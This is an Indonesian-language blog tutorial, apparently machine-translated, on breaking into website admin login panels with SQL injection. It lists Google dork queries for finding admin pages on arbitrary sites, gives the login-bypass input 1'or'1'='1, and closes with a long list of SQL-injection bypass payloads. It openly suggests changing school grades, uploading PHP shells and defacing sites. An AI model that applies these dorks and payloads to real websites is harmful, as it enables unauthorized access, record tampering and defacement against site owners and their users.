Postingan ini akan menjelaskan bagaimana pengambilalihan Admin Login Panel sebuah website menggunakan SQL INJECTION .
Jika Anda un menyadari SQLi Anda dapat membaca posting sebelumnya tutorial rinci di atasnya .
Dengan melewati Login Panel Admin dari sebuah situs web , Anda dapat melakukan apapun yang Anda inginkan ,
Jika website ini sekolah Anda, Anda dapat mengedit nilai Anda juga :p
Anda dapat meng-upload perintah shell php dan deface atau akar website .
Langkah Satu
Untuk menemukan Panel Login Admin dari situs target .
Untuk ini, Anda dapat menggunakan google dorks atau hanya menggunakan alat yang menemukan Admin Login Panel website ( ex . Havij )
Dorks :
inurl : adminlogin.aspx
inurl : admin/index.php
inurl : administrator.php
inurl : administrator.asp
inurl : login.asp
inurl : login.aspx
inurl : login.php
inurl : admin/index.php
inurl : adminlogin.aspx
# Cobalah untuk membuat Dorks Anda sendiri juga untuk mendapatkan tingkat keberhasilan yang lebih .
Ratusan situs akan membuka memiliki /adminlogin.aspx di URL mereka .
Pilih situs web apapun , Anda akan mendapatkan area dari mana admin login.
Langkah Kedua:
Bypass Admin Panel
Isi rincian sebagai :User: 1'or'1'='1
Password: 1'or'1'='1
Gunakan atas rincian yang disebutkan login dan Anda akan masuk ke panel admin website.
Ini tidak akan bekerja untuk semua
website Anda akan menemukan , tapi akan bekerja pada sebagian besar situs web .
Pertanyaan injeksi lainnya :
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)
You Might Also Like
Posting Komentar